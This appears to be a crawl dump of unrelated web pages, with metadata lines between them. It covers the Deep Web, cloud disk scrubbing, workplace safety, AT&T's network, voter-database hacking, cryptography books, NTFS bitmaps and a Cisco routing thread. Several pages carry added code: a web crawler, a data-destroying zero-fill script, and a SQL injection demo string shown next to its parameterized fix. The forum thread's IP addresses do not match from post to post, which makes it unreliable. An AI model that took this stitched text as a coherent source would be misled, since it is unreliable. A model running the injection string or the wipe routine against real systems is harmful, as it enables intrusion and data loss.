available on-line. Standard search engines simply cannot find or retrieve content in the Deep Web. Why? Because many of the Deep Web sources require a direct query to access a database, and standard search engines aren’t built to do that. Standard search engines are the primary means for finding information on the surface Web. These tools (think Google, Yahoo!, and Bing) obtain their results in one of two ways. First, authors may submit their own Web pages for listing directly to the search engine company. Direct listing accounts for a small fraction of surface Web results and means those search tools are often forced to find their own information. Search engines do this by performing a “crawl” or “spider”, following one hypertext link to another. This process takes the pages and puts them into an index that the engine can refer to during future searches. Simply stated, the crawler starts searching for hyperlinks on a page. If that crawler finds one that leads to another document, it records the link and schedules that new page for later crawling. Search engine crawlers extend their indexes further and further from their starting points, like ripples flowing across a pond, in an effort to find everything available. But due to the limitations inherent in crawler searches, they will never find all the content that exists. Thus, to be discovered, “surface” Web pages must be static and linked to other pages. Traditional search engines often cannot “see” or retrieve content in the Deep Web, which includes dynamic content retrieved from a database. How large is the Deep Web? It’s almost impossible to measure the size of the Deep Web. 
While some early estimates put the size of the Deep Web at 4,000-5,000 times larger than surface web, the changing dynamic of how information is accessed and presented means that the Deep Web is growing exponentially and at a rate that defies quantification. Why haven’t I heard about the Deep Web before? In the earliest days of the Web, there were relatively few documents and sites. It was a manageable task to post all documents as static pages; since results were persistent and constantly available they could easily be crawled by conventional search engines. Now, information is published on the Web in a different way. This is especially true for dynamic content, larger sites or traditional information providers moving their content to the Internet. The sheer volume of these sites requires the information to be managed through automated systems with databases. The contents of these databases are hidden in plain sight from standard search engines since they often require a query to produce results. Some of these sites may have hundreds of pages to navigate through, but thousands of pages that can be searched. Think of a major news site, like CNN.com. You would not be able to follow links from their homepage to find a page from two years ago, but you would be able to search for that page because it is stored and available in their database. The evolution of the Web to a database-centric design has been gradual and largely unnoticed. Many Internet information professionals have noted the importance of searchable databases. But BrightPlanet’s Deep Web white paper is the first to comprehensively define and quantify this category of Web content. Is the Deep Web the same thing as the “invisible” Web? In a word, yes. But “invisible” implies that you’ll never see it. That’s why we prefer “Deep Web” – because the information is there if you have the right technology to find it. As early as 1994, Dr. Jill Ellsworth first coined the phrase “invisible Web” to refer to information that was publicly available, but not being returned by conventional search engines. But that is just a semantic difference that doesn’t address the core issue. The real problem is the spidering and crawling technology used by conventional search engines that returns links based on popularity, not content. But this same Big Data content clearly and readily available if different technology, such as the suite of BrightPlanet solutions, is used to access it.
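The crawling process described above, follow links, schedule newly discovered pages, repeat, can be sketched in a few lines. The snippet below is a deliberately naive illustration using only the Python standard library, with a placeholder seed URL; it also shows the limitation being discussed, since anything reachable only through a search form or database query never appears in the link queue.

    # A deliberately naive breadth-first web crawler, to illustrate why
    # link-following search engines only ever see linked, static pages.
    # Real crawlers also need politeness delays, robots.txt handling, and
    # far more robust HTML parsing.
    from collections import deque
    from html.parser import HTMLParser
    from urllib.parse import urljoin
    from urllib.request import urlopen

    class LinkExtractor(HTMLParser):
        def __init__(self):
            super().__init__()
            self.links = []
        def handle_starttag(self, tag, attrs):
            if tag == "a":
                for name, value in attrs:
                    if name == "href" and value:
                        self.links.append(value)

    def crawl(seed, limit=20):
        seen, queue = set(), deque([seed])
        while queue and len(seen) < limit:
            url = queue.popleft()
            if url in seen:
                continue
            seen.add(url)
            try:
                html = urlopen(url, timeout=5).read().decode("utf-8", "ignore")
            except Exception:
                continue  # unreachable page: nothing to index
            parser = LinkExtractor()
            parser.feed(html)
            for href in parser.links:
                queue.append(urljoin(url, href))  # only linked pages are ever discovered
        return seen

    print(crawl("http://example.com/"))  # placeholder seed URL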
<urn:uuid:405a4feb-a822-46ac-b15b-0854d3f2545f>
CC-MAIN-2017-04
https://brightplanet.com/2012/06/deep-web-a-primer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00099-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942531
1,184
2.96875
3
Scrubbing Data a Concern in the Digital Ocean Cloud What happens to cloud data after a virtual machine is destroyed? One cloud vendor reassesses its policy.Security is often cited as a top concern for any organization looking to move to the cloud, and it's a concern that is top of mind this week at cloud hosting vendor Digital Ocean. Developer Jeffrey Paul first raised the issue of data security on Digital Ocean in a Github post earlier this week. Paul noted that Digital Ocean was not by default "scrubbing" user data from its hard drives after a virtual machine instance was deleted by a user. The scrubbing process securely removes any and all residual data that is resident on a drive. The risk of not scrubbing the drive is that another user could potentially get access to the data. The issue only affected users of the Digital Ocean API (application programming interface) who were programmatically creating and destroying new virtual instances (referred to as "droplets" by Digital Ocean). On Dec. 30, Digital Ocean first publicly admitted that it was at fault and should have been scrubbing its drives for API users. Digital Ocean CEO Moisey Uretsky told eWEEK that his company has now defaulted to scrubbing its hard drives for both Web and API virtual machine destroy requests. Digital Ocean had been aware of the issue earlier in 2013 and at one point was scrubbing all of its drives after every virtual machine destroy request. However, as Digital Ocean's utilization went up, the company found that the scrubbing activity was degrading performance and decided to make it an option that API users needed to manually activate.
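Scrubbing in this sense usually just means overwriting the freed blocks with zeros before they can be handed to another tenant. A minimal sketch of the idea follows; the path is a placeholder, and a production scrubber would work at the hypervisor or block-storage layer rather than in a short Python loop like this.

    # Overwrite a disk image (or block device) with zeros, chunk by chunk.
    # WARNING: destructive by design. The path below is a placeholder.
    import os

    def zero_fill(path, chunk_size=4 * 1024 * 1024):
        zeros = b"\x00" * chunk_size
        written = 0
        with open(path, "r+b") as dev:
            size = dev.seek(0, os.SEEK_END)   # total bytes to scrub
            dev.seek(0)
            while written < size:
                n = min(chunk_size, size - written)
                dev.write(zeros[:n])
                written += n
            dev.flush()
            os.fsync(dev.fileno())            # make sure the zeros hit the media
        return written

    # Example (only ever on a scratch image file you do not care about):
    # print(zero_fill("/tmp/old-droplet.img"), "bytes zeroed")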
<urn:uuid:0f6763bf-f337-4777-9825-47e65ae92ba9>
CC-MAIN-2017-04
http://www.eweek.com/cloud/scrubbing-data-a-concern-in-the-digital-ocean-cloud.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00007-ip-10-171-10-70.ec2.internal.warc.gz
en
0.976772
326
2.515625
3
Although you know yellow means caution, you take the opposite action believing the light will not turn red before you glide through, and believing that a car nearing the intersection from another direction won’t run its light at the same time you’re running yours. Believing, despite the risk, that you can do it and get away with it safely. Workers often operate under the same misguided belief. The operator who repeatedly reaches into an unguarded machine to clear a jam believes that because this risky strategy has failed to produce an injury in the past, he or she is somehow protected forever. Beyond asking why the machine was left unguarded, the larger issue is how did the attitudes and beliefs of management enter into this equation? What’s behind the It won’t happen to me mentality? In 1983, we identified two primary types of behavior that lead employees to deny that risk-taking will lead to injury; they still hold true today. One is automatic, non-deliberate or unconscious behavior that results in loss of focus and is characterized by daydreaming, distractions, inattention and stress. The second, premeditated, deliberate or conscious behavior, is demonstrated by taking calculated risks and shortcuts to achieve goals such as saving time, saving money or keeping up appearances. In order to create break-throughs in the pervasive It won’t happen to me belief, it’s necessary to examine the characteristic behaviors, attitudes and beliefs of both management and line employees. The challenge is to help employees at all levels increase the awareness and responsibility they need to stop denying and start accepting the consequences of their actions. It takes a great deal more than task-specific training to combat shortcuts and risk-taking. The fact that an employee chooses not to wear protective eyewear because it is uncomfortable or inconvenient isn’t just that employee’s problem, but reflects the mores of the surroundings. Similarly, the culture of the workplace often mimics the outside pervading culture. Employees are affected by their upbringing, schooling, past experiences with supervisors, and what they observe in the media and the world around them. What they see too often is short sighted, risky behavior. Supervisors or senior line workers who take pride in showing junior employees short cuts to bypass safety protocols; managers emphasizing production over safe work practices. All of these behaviors stem from the It won’t happen to me attitude. With caring and diligence, the workplace can be an ideal laboratory for creating a different environment with different values. Essential to the success of the process is that it be applied universally – from the chief officers to site management to the hourly employee hired just last week. These six steps describe the process: Initially, survey the existing culture to assess prevailing attitudes, beliefs and behaviors related to safety, health and the environment. Strategies include confidential questionnaires, interviews and focus groups. Uncover the dominant attitudes from both management and line employees that influence decision-making and risk-taking. Our training gets behind the risky behavior by addressing the underlying "human mechanisms" that cause people to place themselves at risk. Target skills include self-observation, self-management and interpersonal behaviors. Learning to observe our own behaviors and the thinking that underlies, offers immediate insight into what version of it won’t happen to me is driving the behavior. 
Choices for safe behavior in the moment become immediately apparent. Leaders (managers, shop, stewards, etc.) learn communication, empowerment, coaching, attitude and behavior change and leadership skills. This process leaves no one out. Teamwork, acceptance, participation, positive buy-in and problem solving produce a positive and lasting culture change. It won’t happen to me is replaced by, “We’re all at risk, and we’re all responsible; take care, work together and support each other.” The lessons must be reinforced through refresher training, regular safety meetings focused on awareness, safe attitudes and behaviors, co-worker support and plant-wide communications. Leaders make the transition from safety cops to safety coaches. They provide ongoing support, assuring the steady flow of resources, and bring the process back into alignment as necessary. Everyone works together to develop meaningful processes for observation and feedback, support and empowerment, and actions and activity measures. The process impacts all levels of the workplace – individuals, teams, leaders and the organization itself. When the norms, values, beliefs, attitudes and systems of the prevailing culture changes, so too do individual and collective behavior. Identifying the cause of “It won’t happen to me”, and shifting to “Something can happen and we can prevent every person from getting hurt, and protect our health and the environment”, is an outcome of real culture change. It won’t happen to me can exact a heavy toll, not only on individuals, but also on productivity and the profitability of a business. That toll is measured tragically in thousands of deaths, millions of injuries and environmental incidents, and billions of dollars each year. Measuring the long-term health hazards is challenging but they are there. The key to improvement is an approach that moves you beyond the physical hazards and the unsafe behaviors of individual line and management employees toward a holistic, cultural change. An employee does not have to get his or her hand mangled in a piece of equipment to begin believing in the possibility. For break-through improvement, assess, train, reinforce and support a fundamental alteration in awareness, attitudes and beliefs of everyone involved, and behavior change will follow. About the Authors Michael D. Topf, Founder and President of the Topf Organization, has designed and conducted training courses in Executive Leadership, Management Development and other areas of Organizational Effectiveness. Donald H. Theune, has been a Vice President and Major Project Manager for the Topf Organization since 1991. He has spent over 30 years working with Fortune 500 Companies prior to joining Topf.
<urn:uuid:ba79a185-30a9-4029-92d3-a2665a9eccf8>
CC-MAIN-2017-04
http://www.disaster-resource.com/index.php?option=com_content&amp;view=article&amp;id=301%3Athe-safety-myth-it-wont-happen-to-me&amp;catid=4%3Ahuman-concerns&amp;Itemid=10
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00493-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941587
1,230
2.515625
3
The British set the India-Pakistan borders in 1947. From the beginning, they were fierce rivals. Contested land coupled with religious and cultural disputes led to violence. But not all differences are acted out with violence. The Wagah border is the only road linking the two countries. And every night, the border is closed with a fascinating ceremony. Hundreds of citizens attend the ceremony on both sides. Soldiers put a on an aggressive show. They strut and stomp and chant and yell. This show of force is entertaining and serious at the same time. But there is an undercurrent of respect and cooperation. The ceremony ends with a handshake across the border.
<urn:uuid:1983b185-a3c2-43ae-bd63-70bc9035945e>
CC-MAIN-2017-04
http://videos.komando.com/watch/74/kims-picks-india-pakistan-border-ceremony
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00181-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954157
130
2.90625
3
Even with today's standards and open-source platforms, it is difficult to guarantee content delivery on all platforms. There are three main challenges for content delivery: codecs, bandwidth, and security. One way to make things work faster and reduce the amount of time spent watching irrelevant content is to identify interesting or relevant parts of the content and to recompose it into smaller segments, or summarize it, automatically. In prior work, we summarized "rushes content" to find things that interest users and present videos that were reconstituted to include only this data. Rushes content is most commonly a byproduct of shooting a movie or television series, because before distribution to the public, movies and TV programs undergo a lot of editing by their directors and producers to select each scene from many takes. For two years, TRECVID, an evaluation event sponsored by NIST, provided rushes content from the BBC that was used for an evaluation in a series of summarization tasks. As illustrated on the left, rushes content contains multiple shots (short video segments of 7-30 seconds in length) in which the same scene is filmed multiple times, perhaps for different timing, actor cues, or camera viewpoints. There are two objectives for the summarization task: to minimize the amount of redundant content (i.e. the same actor dialog or same viewpoint) and to emphasize highly unique, or interesting, content (i.e. a different facial expression or location of a person in a scene). Both of these cues can be leveraged to help editors and directors more quickly select the content that they want in the final version of the movie or television program. While it may be easy for a person to say what is interesting in a photo or movie, it is much more challenging for computers. Algorithms that model human interest are generally constructed to emulate the biological processes at work in the human vision system, often referred to as salience. Several methods exist to identify high-salience locations in an image and over time in videos. Our parallel efforts in content-based copy detection algorithms harness local feature points, which look like sharp edges and corners and have been found to be some of the first points in an image that humans identify. In this work, we focused on methods that identified regions of high difference in terms of color, intensity, and edge structure. After computing salience images with each modality at different scales, an average image is composed from all three. With these final salience images, different parts of a video can be compared to each other to select the most salient (or most important) video segment. After the shots of a video have been scored with a salience algorithm, a number of interesting applications can be created from summarized content. Three applications are given below along with two summary renderings that were evaluated as part of the TRECVID 2007 BBC Rushes evaluation. In this work, we evaluated several permutations both programmatically and subjectively through several user ratings. The Alliance for Telecommunications Industry Solutions (ATIS) develops standards for a broad range of communications applications. The ATIS IPTV Interoperability Forum (IIF) is a subgroup focused on advanced television services delivered over managed networks to connected TVs, set-top boxes, and mobile devices.
The scope of the work includes delivery of HD and 3D live TV programming over multicast IP transport, targeted advertising, video and other content on demand, and DVR capabilities. Rigorous content security protocols and detailed quality of service metrics are defined, and the services support broadcast requirements for accessibility and emergency alerting. Data models are defined for content description, program guides, user preferences, etc., and are represented in XML schemas to ensure interoperability. These schemas are harmonious with existing industry standards such as OMA BCAST and MPEG-7. All forms of the Content Analysis Engine support MPEG-7 representation of extracted metadata, enabling advanced video services in a standards-compliant manner.
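Returning to the salience-based summarization described earlier: the shot-scoring idea can be sketched roughly as "compute per-pixel difference maps for color, intensity and edge structure, average them into one salience map, and give each shot the mean salience of its frames." The snippet below is a toy approximation of that pipeline using NumPy, with invented helper names; it is not the actual research code.

    # Toy salience scoring for video frames: combine colour, intensity and
    # edge "difference" maps into one salience map, then score each shot by
    # the mean salience of its frames. Illustrative only.
    import numpy as np

    def intensity_map(frame):
        return frame.mean(axis=2)                      # grey-level image

    def color_contrast_map(frame):
        grey = intensity_map(frame)[..., None]
        return np.abs(frame - grey).mean(axis=2)       # distance from grey

    def edge_map(frame):
        gy, gx = np.gradient(intensity_map(frame))
        return np.hypot(gx, gy)                        # gradient magnitude

    def salience_map(frame):
        maps = [intensity_map(frame), color_contrast_map(frame), edge_map(frame)]
        # Normalise each modality to [0, 1] before averaging, so that no
        # single modality dominates the combined salience image.
        norm = [(m - m.min()) / (np.ptp(m) + 1e-9) for m in maps]
        return np.mean(norm, axis=0)

    def shot_score(frames):
        return float(np.mean([salience_map(f).mean() for f in frames]))

    # Fake "shots" of random 64x64 RGB frames, just to exercise the pipeline.
    rng = np.random.default_rng(0)
    shots = [rng.random((10, 64, 64, 3)) for _ in range(3)]
    scores = [shot_score(s) for s in shots]
    print("most salient shot:", int(np.argmax(scores)), scores)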
<urn:uuid:bcae6cff-0fb5-4239-ac50-8550c55d0cfd>
CC-MAIN-2017-04
http://www.research.att.com/projects/Video/consumption.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00209-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938233
803
2.9375
3
What You Need to Know About Your Network How does a mobile phone work? Mobile devices are two-way radio devices that let you make a call, send short messages and connect to the Internet wirelessly. The devices communicate with the network by a wireless signal between the mobile phone and a nearby cell site. That cell site is connected to the wired network, and from there it either routes your call to another person, a messaging gateway or connects the user to the Internet. What is a cellular network and how does it work? A cellular network is a radio network made up of cell sites. Each of the sites is connected to the wired network via "backhaul." To help maintain your connection as you move from location to location, the signals for your mobile device are "handed over" to another nearby cell site in order to provide the best coverage. How are the signals transmitted to the cell site? The mobile device "communicates" with a nearby cell site via wireless signal over a frequency dedicated for use by AT&T. The use of these airwaves (spectrum) is similar to tuning into a radio station — each has a particular frequency dedicated for their use to help avoid interference. We currently use frequencies in the 1900 MHz and 850 MHz ranges, although we have licenses to operate in other ranges. What does a cell site typically look like? They come in all shapes and sizes, but the most common is a tower that consists of a tower structure with three sets of rectangular antennae at the top. Some cell sites are located atop buildings. What type of technology does AT&T use in their mobile network? We use technology based on the 3GPP family of standards. Currently our wireless networks consist of GSM/EDGE and UMTS/HSPA and we have announced plans to begin to deploy LTE in 2011. The 3GPP family of standards are the most broadly-deployed worldwide, and allow for our customers to use their mobile devices on networks around the world. The standard determines how the digital wireless signal is transmitted between the mobile device and the cell tower and also manages the limited amount of frequency available in a given location. What about data speeds? That depends on the network technology. Our mobile broadband network utilizes HSPA, which is part of the 3GPP family of technology standards, and covers nearly 80 percent of the U.S. population. With mobile broadband, customers can not only surf the Web and download files faster than ever, but they can also experience the very latest interactive mobile applications. We also provide data service via our EDGE network, which is based on the GSM standard and is available throughout our network footprint. Will my mobile device work on other companies' networks? In most cases around the world, yes. That's because we use the 3GPP family of technology standards, which includes GSM and UMTS/HSPA, the most widely-deployed standard around the world. There are two major things to consider in compatibility for your mobile device: technology (i.e. GSM/UMTS) and frequency. Some of our competitors in the United States use a different network technology, so your handset won't necessarily work on their network. Okay, so what about dropped calls? Why does that happen? Dropped calls can occur for several reasons — capacity limitations (congestion) and traveling out of the range of the network (coverage) are the more common issues. Sometimes it can be attributed to the "handoff" of the wireless signal between cell sites. 
To address these issues, AT&T is constantly monitoring and optimizing our network to minimize them as much as possible. But we also encourage you to let us know if there's an area in which you've noticed problems. What is the difference between 850 MHz and 1900 MHz? Much like an FM radio signal and an AM signal have different advantages, so do the 850 MHz and 1900 MHz frequencies. 850 MHz offers better in-building coverage because the signal can better penetrate walls than signals at other frequencies, while 1900 MHz is best for protection against interference with nearby sites. I'm not happy with the coverage in my area, what can you do to improve it? There are actually quite a few things that we can do to provide better coverage, but it can depend on several factors — some of which may be out of our control. While we're constantly monitoring and optimizing the network to ensure the best coverage possible, sometimes we need to obtain permits to install new cell sites or even upgrade existing locations. Earlier this year we began a major initiative to expand mobile broadband capacity throughout the country, which will help to relieve congestion. We are also trialing a new technology called femtocells, which will improve mobile broadband coverage in consumer dwellings. Why can't I get coverage in my basement, inside a building, etc.? Like all wireless technologies, things like buildings and other large, immobile objects (trees, walls, concrete foundations, etc.) interfere with wireless signals. While some frequencies can better penetrate walls, sometimes it will not matter if the obstruction is big enough. It's just like a TV signal — you'll tend to get better reception closer to the window than you would in your basement, for the most part.
<urn:uuid:ac07cff0-8207-4b1b-b4fa-78cd8d000239>
CC-MAIN-2017-04
https://www.att.com/gen/press-room?pid=14003
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00209-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955747
1,080
3.296875
3
Hackers are always getting their hands into sticky situations, but one of the hot topics in world politics--the 2016 United States presidential election--is one of the nastier ones in recent years. In the past few months alone, hackers have reportedly breached not only the Democratic National Committee, but have also infiltrated at least two state election databases. The two databases in question housed the voter registration information for the states of Illinois and Arizona. In regards to Illinois, personal data for 200,000 voters was stolen over the course of 10 days. The Arizona attack was unsuccessful, and no voter data was stolen. What’s unclear is whether or not these hacking attacks are connected to the recent influx of hacking attacks against political groups. As reported by CIO: “According to the FBI’s alert, ‘an unknown actor’ attacked a state election database by using widely available penetration testing tools, including Acunetix, SQLMap, and DirBuster. The hackers then found an SQL injection vulnerability -- a common attack point in websites -- and exploited it to steal the data. The FBI has traced the attacks to eight IP addresses, which appear to be hosted from companies based in Bulgaria, the Netherlands, and Russia.” This election season is proving to be quite the center of controversy, as there have been claims of election fraud pouring in from all over the United States. There have been reports of supposed “voter fraud,” in which voters had their registrations altered prior to their state primary elections. However, with the hack of the DNC, there are hushed whispers and many outspoken “professionals” on social media that hackers may influence this year’s presidential election. In fact, the United States has recently pointed the finger at Russia as the perpetrator of the DNC hack. However, Homeland Security Secretary Jeh Johnson issued a statement regarding these fears: Homeland Security was not aware of “specific or credible cybersecurity threats” that could affect the election. Yet, these reassurances do little to mitigate the fact that these systems were infiltrated and accessed. These events just go to show that even big targets don’t have the systems put into place to protect their infrastructures from cyber threats. If major political entities and systems that could assist with determining the future of an entire country can fall victim to a cyber attack, what does that say about your business’s infrastructure? What we’re saying shouldn’t be news; even the smallest targets hold information that could potentially be very valuable to any hacker. To learn how you can protect your small business from hackers of all shapes and sizes, reach out to us at 631-648-0026.
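On the technical side, the FBI alert quoted above names a SQL injection flaw as the entry point. The standard defense is to never build queries by string concatenation and to use parameterized statements instead; the short sketch below (Python with SQLite, table and column names invented) contrasts the vulnerable pattern with the safe one.

    # Contrast a SQL-injection-prone query with a parameterized one.
    # Table and column names are invented for illustration.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE voters (id INTEGER, name TEXT, county TEXT)")
    conn.execute("INSERT INTO voters VALUES (1, 'Alice', 'Cook')")

    user_input = "Cook' OR '1'='1"   # what an attacker might submit

    # VULNERABLE: the input is pasted straight into the SQL text, so the
    # attacker's quote characters change the meaning of the query.
    unsafe_sql = "SELECT * FROM voters WHERE county = '%s'" % user_input
    print("unsafe returns:", conn.execute(unsafe_sql).fetchall())

    # SAFE: the value is passed as a bound parameter; the database treats it
    # as data, never as SQL, so the injection attempt matches nothing.
    safe_sql = "SELECT * FROM voters WHERE county = ?"
    print("safe returns:", conn.execute(safe_sql, (user_input,)).fetchall())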
<urn:uuid:d8f55340-a2a4-4ac8-9596-95cf681be138>
CC-MAIN-2017-04
https://nerdsthatcare.com/nerd-alerts/entry/hackers-target-voter-information-databases-to-steal-personal-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00419-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96409
557
2.609375
3
8.1 Where can I learn more about cryptography? There are a number of textbooks available to the student of cryptography. Among the most useful are the following three.
Applied Cryptography by B. Schneier, John Wiley & Sons, Inc, 1996. Schneier's book is an accessible and practically oriented book with very broad coverage of recent and established cryptographic techniques.
Handbook of Applied Cryptography by A.J. Menezes, P.C. van Oorschot, S.A. Vanstone. CRC Press, 1996. The HAC offers a thorough treatment of cryptographic theory and protocols, with a great deal of detailed technical information. It is an excellent reference book, but somewhat technical, and not aimed to serve as an introduction to cryptography.
Cryptography: Theory and Practice by D. R. Stinson. CRC Press, 1995. This is a textbook, and includes exercises. Theory comes before practice in both title and content, but the book provides a good introduction to the fundamentals of cryptography.
For additional information, or more detailed information about specific topics, the reader is referred to the chapter summaries and bibliographies in any one of these texts.
<urn:uuid:ff233eb4-d02f-4695-831e-9ab2bb5c6d8f>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/where-can-i-learn-more-about-cryptography.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00237-ip-10-171-10-70.ec2.internal.warc.gz
en
0.885271
243
3.296875
3
When you suddenly can’t access your files, but nothing seems wrong with the hard drive, how can you get your data back? Data recovery cases often depend on getting past broken links in the organizational structure the drive relied on to find your pictures, documents and other files. In a previous post, we took a general look at some of the organizational structure – or “meta data” – of a hard drive. In this post, I want to offer a more specific look at how one element of meta data on drives formatted by Windows, called the bitmap, can be used to make data recovery faster and more effective. The bitmap is useful in recoveries where there are logical puzzles and also in cases where the drive has physically failed. The bitmap exists on NTFS formatted drives. NTFS – or New Technology File System – is a way to organize data. It was developed by Microsoft and it’s found on drives using Windows or formatted by Windows. Macs use a different ways to organize data, as do other operating systems. The bitmap, as its name suggests, gives the lay of the land. The bitmap exists as a hidden file called $Bitmap at the root of each NTFS partition. It shows your hard drive where it can find data and where there is available space to write new data. To understand how it does this, let’s first take a quick look at how data exists on a hard drive. The 1s and 0s you’ve probably heard about are in reality tiny patches of metallic film that are either magnetized or not. They are arranged in concentric circles on all sides of the multiple spinning discs inside a hard drive. Eight of these 1s or 0s is called a byte, and a byte has 256 possibilities, since flipping the eight switches (the 1s and 0s) gives you two to the eighth power. These possibilities are assigned values. For example, the byte 01100001 in binary code translates to the letter “a” in ASCII text. Contiguous bytes are organized into a sector – typically 512 (another power of two) bytes per sector. Contiguous sectors in turn are grouped into clusters. Cluster sizes vary in size, but 8 sectors per cluster – resulting in 4 kilobyte clusters – is common. A file – for example, a photograph of your dog – may occupy several clusters, which may or may not be next to one another. A bitmap is a file that simply records which clusters have been used. For each cluster, the bitmap file assigns a 1 if that cluster has any data written to it, or a 0 if it is available space. As you alter the data on your drive, the bitmap adjusts. If you delete a file, the bitmap will show the area it occupies as now available space, with 0s for those clusters. (Which is why it’s called “zero filling” when we erase all data from a drive.) If you write data to the drive, the bitmap flips the switches to 1s for the clusters that current data now occupies. It’s important to stop here to make a distinction. Data can exist on your hard drive without being recorded by the bitmap or being part of the overall structure of organized data. The bitmap only keeps track of the relevant stuff – the stuff your computer considers saved data. For example, if you delete a file, the 0s and 1s that comprise it are not automatically overwritten with anything, but it’s no longer relevant. The clusters the deleted file occupies will now be considered available space. In the bitmap, those cluster addresses will now be marked with 0s. On the actual surface of the disk, those magnetized/not-magnetized patches (the 1s and 0s) of the deleted file still exist, but they are not protected. 
The next time the drive records data, it is free to write over the file that was deleted. This is why it's important to stop using your computer if you accidentally delete important data. If you continue to use the machine, you risk the hard drive writing data over the file you've lost. Now, let's look at how all this information about the bitmap applies to data recovery. If you are recovering data from a drive that failed mechanically – say it stopped spinning – and you can read the bitmap, you can use it to image only the used area. This can save a considerable amount of time. The alternative, which is the way most data recovery software works, is to start at Sector 0 and just grind away until every sector is read. Not only does this take unnecessary time, it can put the data at risk if the drive is severely troubled. If it had damage to the read/write heads – and perhaps some light rotational scoring – a complete read starting from Sector 0 may cause the replacement heads to fail, perhaps resulting in more surface scratches. The attempt to image the drive in this crude way could render the data permanently unusable. So, if you are using data recovery software, and it just hangs and hangs, or seems to be making no discernible progress, shut it down. The bitmap is also highly useful in cases where the drive has been reformatted mistakenly or important files have been deleted. In these cases, the bitmap shows where not to look. Deleted files or the files that existed before the drive was reformatted or had its operating system reinstalled are all no longer relevant to the current file system. They are off the grid, living in unallocated space. To find them, look in all the clusters whose addresses the bitmap has labeled as empty. The clusters that the bitmap considers used hold the new data that is not of interest – the new format, the new operating system, the files that were not accidentally deleted. There are many more ways that data recovery can become more elegant with greater understanding of the logical structure of a hard drive's file system. With this understanding, better software can be built to make imaging a drive faster and more reliable.
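The $Bitmap file itself is just a packed bit array: one bit per cluster, 1 for allocated, 0 for free. A small sketch of how recovery software can use it follows; the bitmap bytes are a made-up example, and a real NTFS tool also has to read the boot sector to learn the cluster size and locate $Bitmap in the first place.

    # Interpret an NTFS-style allocation bitmap: one bit per cluster,
    # least-significant bit first within each byte (1 = used, 0 = free).
    # The bitmap bytes below are a made-up example for illustration.

    def cluster_state(bitmap, cluster):
        byte = bitmap[cluster // 8]
        return (byte >> (cluster % 8)) & 1      # 1 = allocated, 0 = free

    def used_runs(bitmap, total_clusters):
        # Yield (start, length) runs of allocated clusters - the only areas
        # worth imaging when cloning a failing drive.
        run_start = None
        for c in range(total_clusters):
            if cluster_state(bitmap, c):
                if run_start is None:
                    run_start = c
            elif run_start is not None:
                yield run_start, c - run_start
                run_start = None
        if run_start is not None:
            yield run_start, total_clusters - run_start

    example_bitmap = bytes([0b00001111, 0b11000000, 0b00000001])  # 24 clusters
    for start, length in used_runs(example_bitmap, 24):
        print(f"image clusters {start}..{start + length - 1} ({length} clusters)")

    # Hunting for deleted files is the inverse: scan only clusters whose
    # bit is 0, i.e. space the current file system considers free.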
<urn:uuid:afc9cf90-2d9a-4ee9-b0ce-ff5ee671513d>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery/using-the-bitmap-to-make-data-recovery-more-efficient/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00355-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949874
1,268
3.234375
3
In some software development projects the requirements supporting the business objectives are easily defined, while in other projects they are more difficult to determine at the start of the project. IT leaders should avoid a "one-size-fits-all" project development methodology and tailor their strategy to maximize project quality and efficiency. Software Development Methodologies Waterfall and Agile software development methodologies are conceptual frameworks for undertaking software engineering projects. They both follow Software Development Lifecycle (SDLC) best practice concepts for software development projects describing each stage of development from feasibility to maintenance.
<urn:uuid:8a24cb42-6b8a-4b49-a09f-0919b19b4645>
CC-MAIN-2017-04
https://www.infotech.com/research/chasing-the-waterfall-may-lead-to-project-downfall
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00174-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896658
112
2.546875
3
What is the Class A, B, or C network of the following address: Sat Apr 21, 2012 2:51 pm Sat Apr 21, 2012 6:56 pm R3 is configured to use classful routing. With classful routing, the router first matches the Class A, B, or C network number in which a destination resides. If the Class A, B, or C network is found, Cisco IOS Software then looks for the specific subnet number. If it isn't found, the packet is discarded, as is the case with the ICMP echoes sent with the ping 18.104.22.168 command. However, with classful routing, if the packet does not match a Class A, B, or C network in the routing table, and a default route exists, the default route is indeed used--which is why R3 can forward the ICMP echoes sent by the successful ping 10.1.1.1 command. In short, with classful routing, the only time the default route is used is when the router does not know about any subnets of the packet's destination Class A, B, or C network. Sat Apr 21, 2012 10:59 pm So, if the destination address is 22.214.171.124, the classful B network is 126.96.36.199, correct? Since there aren't any subnets of this network in the routing table, shouldn't the ping 188.8.131.52 succeed by using the default route? Sun Apr 22, 2012 1:30 am Sun Apr 22, 2012 11:39 am mellowd wrote:It should be using the default route yes, but what about return traffic? What does the route table look like on the responder? What happens when you traceroute? What happens when you ping with a source address of your Ethernet interface?
